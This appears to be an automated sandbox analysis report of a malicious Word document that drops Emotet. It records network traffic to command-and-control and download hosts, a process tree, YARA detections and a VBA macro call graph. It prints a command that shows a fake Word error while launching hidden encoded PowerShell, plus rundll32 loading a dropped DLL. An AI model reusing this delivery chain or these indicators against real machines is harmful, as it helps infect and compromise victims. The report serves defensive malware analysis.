                                                                                                                              Feb 1, 2021 23:25:17.900079012 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900129080 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900190115 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900206089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900283098 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900361061 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900366068 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900448084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900520086 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900527000 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900603056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900669098 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900671005 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900746107 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900806904 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900824070 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900867939 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900928020 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900990009 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901046038 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901053905 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901108980 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901115894 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901161909 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901230097 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901279926 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901289940 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901338100 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901350021 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901413918 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901436090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901490927 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901540995 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901575089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901591063 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901640892 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901665926 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901690960 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901740074 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901761055 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901788950 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901838064 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901856899 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901886940 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901937008 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901988029 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901995897 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.902079105 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.054636002 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054683924 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054754019 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054821014 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054883003 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054928064 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.054949045 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055012941 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055012941 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055067062 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055074930 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055135965 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055197954 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055198908 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055259943 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055304050 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055322886 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055389881 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055406094 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055466890 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055541039 CET4434974435.208.182.43192.168.2.4

                                                                                                                              UDP Packets

                                                                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                              Feb 1, 2021 23:25:10.767510891 CET5172653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:10.823693037 CET53517268.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:11.948971987 CET5679453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.007550001 CET53567948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:12.912555933 CET5653453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.960546017 CET53565348.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.668315887 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:13.724653006 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.963905096 CET5662753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:14.015094995 CET53566278.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.228617907 CET5662153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.279382944 CET53566218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.730209112 CET6311653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.794337988 CET53631168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.395081997 CET6407853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.455329895 CET53640788.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.674420118 CET6480153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET53648018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.854863882 CET6172153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET53617218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.589114904 CET5125553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:17.639827013 CET53512558.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:21.696125984 CET6152253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:21.755196095 CET53615228.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:23.831988096 CET5233753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:23.880327940 CET53523378.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:29.161744118 CET5504653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:29.224725962 CET53550468.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:43.635374069 CET4961253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:43.695733070 CET53496128.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.288331985 CET4928553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:44.344719887 CET53492858.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.961225033 CET5060153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.010988951 CET53506018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.397160053 CET6087553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.469964027 CET5644853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.472508907 CET53608758.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.556623936 CET53564488.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.067111015 CET5917253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.123389006 CET53591728.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.673748970 CET6242053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.730539083 CET53624208.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.361151934 CET6057953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.420326948 CET53605798.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.830176115 CET5018353192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.878108978 CET53501838.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:48.203210115 CET6153153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:48.259474993 CET53615318.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:49.472291946 CET4922853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:49.531461000 CET53492288.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:50.022305012 CET5979453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:50.074915886 CET53597948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:59.745949030 CET5591653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:59.794500113 CET53559168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:00.062516928 CET5275253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:00.121984959 CET53527528.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:02.930495024 CET6054253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:02.991489887 CET53605428.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:33.801259041 CET6068953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:33.850214958 CET53606898.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.533540964 CET6420653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:35.589812994 CET53642068.8.8.8192.168.2.4

                                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 1, 2021 23:25:15.730209112 CET | 192.168.2.4 | 8.8.8.8 | 0xd28e | Standard query (0) | physio-svdh.ch | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.674420118 CET | 192.168.2.4 | 8.8.8.8 | 0x8fb2 | Standard query (0) | www.isatechnology.com | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.854863882 CET | 192.168.2.4 | 8.8.8.8 | 0xb149 | Standard query (0) | www.isatechnology.com | A (IP address) | IN (0x0001)

                                                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 1, 2021 23:25:15.794337988 CET | 8.8.8.8 | 192.168.2.4 | 0xd28e | No error (0) | physio-svdh.ch | | 194.209.195.106 | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.839863062 CET | 8.8.8.8 | 192.168.2.4 | 0x8fb2 | No error (0) | www.isatechnology.com | isatechnology.com | | CNAME (Canonical name) | IN (0x0001)
Feb 1, 2021 23:25:16.839863062 CET | 8.8.8.8 | 192.168.2.4 | 0x8fb2 | No error (0) | isatechnology.com | | 35.208.182.43 | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.910959005 CET | 8.8.8.8 | 192.168.2.4 | 0xb149 | No error (0) | www.isatechnology.com | isatechnology.com | | CNAME (Canonical name) | IN (0x0001)
Feb 1, 2021 23:25:16.910959005 CET | 8.8.8.8 | 192.168.2.4 | 0xb149 | No error (0) | isatechnology.com | | 35.208.182.43 | A (IP address) | IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • 173.249.20.233
                                                                                                                                • 173.249.20.233:443

                                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 173.249.20.233 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Feb 1, 2021 23:26:34.798719883 CET | 5316 | OUT | POST /hzctvbal94fl2bqa/ HTTP/1.1
                                                                                                                              DNT: 0
                                                                                                                              Referer: 173.249.20.233/hzctvbal94fl2bqa/
                                                                                                                              Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: 173.249.20.233:443
                                                                                                                              Content-Length: 8516
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cache-Control: no-cache
Feb 1, 2021 23:26:35.634749889 CET | 5329 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 01 Feb 2021 22:26:35 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              Vary: Accept-Encoding

                                                                                                                              HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 1, 2021 23:25:15.906698942 CET | 194.209.195.106 | 443 | 192.168.2.4 | 49742 | CN=physio-svdh.ch; CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US; CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Jan 02 17:26:00 CET 2021; Wed Oct 07 21:21:40 CEST 2020 | Fri Apr 02 18:26:00 CEST 2021; Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
 | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |
Feb 1, 2021 23:25:17.220958948 CET | 35.208.182.43 | 443 | 192.168.2.4 | 49744 | CN=isatechnology.com; CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US; CN=DST Root CA X3, O=Digital Signature Trust Co. | Fri Jan 15 19:51:39 CET 2021; Wed Oct 07 21:21:40 CEST 2020 | Thu Apr 15 20:51:39 CEST 2021; Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
 | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                                                                                                                              Code Manipulations

                                                                                                                              System Behavior

                                                                                                                              General

Start time: 23:25:04
Start date: 01/02/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x1d0000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                              General

Start time: 23:25:08
Start date: 01/02/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\msg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                                                              Imagebase:0x7ff79a800000
                                                                                                                              File size:26112 bytes
                                                                                                                              MD5 hash:EEB395D8DD3C1D6593903BD640687948
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:23:25:10
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:POwersheLL -w hidden -ENCOD [encoded command not preserved]
                                                                                                                              Imagebase:0x7ff7bedd0000
                                                                                                                              File size:447488 bytes
                                                                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:18
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x7ff760c70000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:19
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:22
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:24
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:34
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:42
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Call Graph

                                                                                                                              Graph

                                                                                                                              • Entrypoint
                                                                                                                              • Decryption Function
                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              Call graph nodes: 9 Document_open; 129 Joieredaxt98oc6o (Len:1, Create:1, Mid:1, ChrW:1, CreateObject:1); 15 Gdxyahu7r2bnouqu; 801 Us5rvv097omc6
                                                                                                                              Call graph edges: 9->129; 129->801 (x 2); 801->15

                                                                                                                              Module: Dk5att0cu_9jsb

                                                                                                                              Declaration
                                                                                                                              Attribute VB_Name = "Dk5att0cu_9jsb"
                                                                                                                              Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = True
                                                                                                                              Attribute VB_TemplateDerived = True
                                                                                                                              Attribute VB_Customizable = True

                                                                                                                              Non-Executed Functions
                                                                                                                              APIs | Meta Information

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Item

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: ChrW

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: wdKeyS

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: CreateObject

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Mid

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Len

                                                                                                                              Part of subcall function Joieredaxt98oc6o@Lxvinhyq0hu0i: Open

